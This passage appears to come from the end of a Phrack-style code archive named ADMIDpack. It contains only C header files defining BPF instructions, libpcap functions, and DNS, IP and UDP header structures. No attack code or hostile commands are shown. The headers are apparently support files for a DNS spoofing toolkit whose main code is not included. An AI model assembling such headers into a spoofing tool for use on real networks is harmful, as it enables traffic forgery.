#define DLT_ATM_RFC1483 11 /* LLC/SNAP encapsulated atm */
#define DLT_RAW 12 /* raw IP */
#define DLT_SLIP_BSDOS 13 /* BSD/OS Serial Line IP */
#define DLT_PPP_BSDOS 14 /* BSD/OS Point-to-point Protocol */
/*
* The instruction encondings.
*/
/* instruction classes */
#define BPF_CLASS(code) ((code) & 0x07)
#define BPF_LD 0x00
#define BPF_LDX 0x01
#define BPF_ST 0x02
#define BPF_STX 0x03
#define BPF_ALU 0x04
#define BPF_JMP 0x05
#define BPF_RET 0x06
#define BPF_MISC 0x07
/* ld/ldx fields */
#define BPF_SIZE(code) ((code) & 0x18)
#define BPF_W 0x00
#define BPF_H 0x08
#define BPF_B 0x10
#define BPF_MODE(code) ((code) & 0xe0)
#define BPF_IMM 0x00
#define BPF_ABS 0x20
#define BPF_IND 0x40
#define BPF_MEM 0x60
#define BPF_LEN 0x80
#define BPF_MSH 0xa0
/* alu/jmp fields */
#define BPF_OP(code) ((code) & 0xf0)
#define BPF_ADD 0x00
#define BPF_SUB 0x10
#define BPF_MUL 0x20
#define BPF_DIV 0x30
#define BPF_OR 0x40
#define BPF_AND 0x50
#define BPF_LSH 0x60
#define BPF_RSH 0x70
#define BPF_NEG 0x80
#define BPF_JA 0x00
#define BPF_JEQ 0x10
#define BPF_JGT 0x20
#define BPF_JGE 0x30
#define BPF_JSET 0x40
#define BPF_SRC(code) ((code) & 0x08)
#define BPF_K 0x00
#define BPF_X 0x08
/* ret - BPF_K and BPF_X also apply */
#define BPF_RVAL(code) ((code) & 0x18)
#define BPF_A 0x10
/* misc */
#define BPF_MISCOP(code) ((code) & 0xf8)
#define BPF_TAX 0x00
#define BPF_TXA 0x80
/*
* The instruction data structure.
*/
struct bpf_insn {
u_short code;
u_char jt;
u_char jf;
bpf_int32 k;
};
/*
* Macros for insn array initializers.
*/
#define BPF_STMT(code, k) { (u_short)(code), 0, 0, k }
#define BPF_JUMP(code, k, jt, jf) { (u_short)(code), jt, jf, k }
#ifdef KERNEL
extern u_int bpf_filter();
extern void bpfattach();
extern void bpf_tap();
extern void bpf_mtap();
#else
#if __STDC__
extern u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int);
#endif
#endif
/*
* Number of scratch memory words (for BPF_LD|BPF_MEM and BPF_ST).
*/
#define BPF_MEMWORDS 16
#endif
<-->
<++> ADMIDpack/dns.h
#define DNSHDRSIZE 12
struct dnshdr {
unsigned short int id;
unsigned char rd:1; /* recursion desired */
unsigned char tc:1; /* truncated message */
unsigned char aa:1; /* authoritive answer */
unsigned char opcode:4; /* purpose of message */
unsigned char qr:1; /* response flag */
unsigned char rcode:4; /* response code */
unsigned char unused:2; /* unused bits */
unsigned char pr:1; /* primary server required (non standard) */
unsigned char ra:1; /* recursion available */
unsigned short int que_num;
unsigned short int rep_num;
unsigned short int num_rr;
unsigned short int num_rrsup;
};
<-->
<++> ADMIDpack/ip.h
/* adapted from tcpdump */
#ifndef IPVERSION
#define IPVERSION 4
#endif /* IPVERISON */
struct iphdr {
u_char ihl:4, /* header length */
version:4; /* version */
u_char tos; /* type of service */
short tot_len; /* total length */
u_short id; /* identification */
short off; /* fragment offset field */
#define IP_DF 0x4000 /* dont fragment flag */
#define IP_MF 0x2000 /* more fragments flag */
u_char ttl; /* time to live */
u_char protocol; /* protocol */
u_short check; /* checksum */
struct in_addr saddr, daddr; /* source and dest address */
};
#ifndef IP_MAXPACKET
#define IP_MAXPACKET 65535
#endif /* IP_MAXPACKET */
<-->
<++> ADMIDpack/pcap.h
/*
* Copyright (c) 1993, 1994, 1995, 1996, 1997
* The Regents of the University of California. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* This product includes software developed by the Computer Systems
* Engineering Group at Lawrence Berkeley Laboratory.
* 4. Neither the name of the University nor of the Laboratory may be used
* to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* @(#) $Header: pcap.h,v 1.21 97/10/15 21:59:13 leres Exp $ (LBL)
*/
#ifndef lib_pcap_h
#define lib_pcap_h
#include <sys/types.h>
#include <sys/time.h>
#include <bpf.h>
#include <stdio.h>
#define PCAP_VERSION_MAJOR 2
#define PCAP_VERSION_MINOR 4
#define PCAP_ERRBUF_SIZE 256
/*
* Compatibility for systems that have a bpf.h that
* predates the bpf typedefs for 64-bit support.
*/
#if BPF_RELEASE - 0 < 199406
typedef int bpf_int32;
typedef u_int bpf_u_int32;
#endif
typedef struct pcap pcap_t;
typedef struct pcap_dumper pcap_dumper_t;
/*
* The first record in the file contains saved values for some
* of the flags used in the printout phases of tcpdump.
* Many fields here are 32 bit ints so compilers won't insert unwanted
* padding; these files need to be interchangeable across architectures.
*/
struct pcap_file_header {
bpf_u_int32 magic;
u_short version_major;
u_short version_minor;
bpf_int32 thiszone; /* gmt to local correction */
bpf_u_int32 sigfigs; /* accuracy of timestamps */
bpf_u_int32 snaplen; /* max length saved portion of each pkt */
bpf_u_int32 linktype; /* data link type (DLT_*) */
};
/*
* Each packet in the dump file is prepended with this generic header.
* This gets around the problem of different headers for different
* packet interfaces.
*/
struct pcap_pkthdr {
struct timeval ts; /* time stamp */
bpf_u_int32 caplen; /* length of portion present */
bpf_u_int32 len; /* length this packet (off wire) */
};
/*
* As returned by the pcap_stats()
*/
struct pcap_stat {
u_int ps_recv; /* number of packets received */
u_int ps_drop; /* number of packets dropped */
u_int ps_ifdrop; /* drops by interface XXX not yet supported */
};
typedef void (*pcap_handler)(u_char *, const struct pcap_pkthdr *,
const u_char *);
char *pcap_lookupdev(char *);
int pcap_lookupnet(char *, bpf_u_int32 *, bpf_u_int32 *, char *);
pcap_t *pcap_open_live(char *, int, int, int, char *);
pcap_t *pcap_open_offline(const char *, char *);
void pcap_close(pcap_t *);
int pcap_loop(pcap_t *, int, pcap_handler, u_char *);
int pcap_dispatch(pcap_t *, int, pcap_handler, u_char *);
const u_char*
pcap_next(pcap_t *, struct pcap_pkthdr *);
int pcap_stats(pcap_t *, struct pcap_stat *);
int pcap_setfilter(pcap_t *, struct bpf_program *);
void pcap_perror(pcap_t *, char *);
char *pcap_strerror(int);
char *pcap_geterr(pcap_t *);
int pcap_compile(pcap_t *, struct bpf_program *, char *, int,
bpf_u_int32);
/* XXX */
int pcap_freecode(pcap_t *, struct bpf_program *);
int pcap_datalink(pcap_t *);
int pcap_snapshot(pcap_t *);
int pcap_is_swapped(pcap_t *);
int pcap_major_version(pcap_t *);
int pcap_minor_version(pcap_t *);
/* XXX */
FILE *pcap_file(pcap_t *);
int pcap_fileno(pcap_t *);
pcap_dumper_t *pcap_dump_open(pcap_t *, const char *);
void pcap_dump_close(pcap_dumper_t *);
void pcap_dump(u_char *, const struct pcap_pkthdr *, const u_char *);
/* XXX this guy lives in the bpf tree */
u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int);
char *bpf_image(struct bpf_insn *, int);
#endif
<-->
<++> ADMIDpack/udp.h
struct udphdr {
u_short source; /* source port */
u_short dest; /* destination port */
u_short len; /* udp length */
u_short check; /* udp checksum */
};
<-->
----[ EOF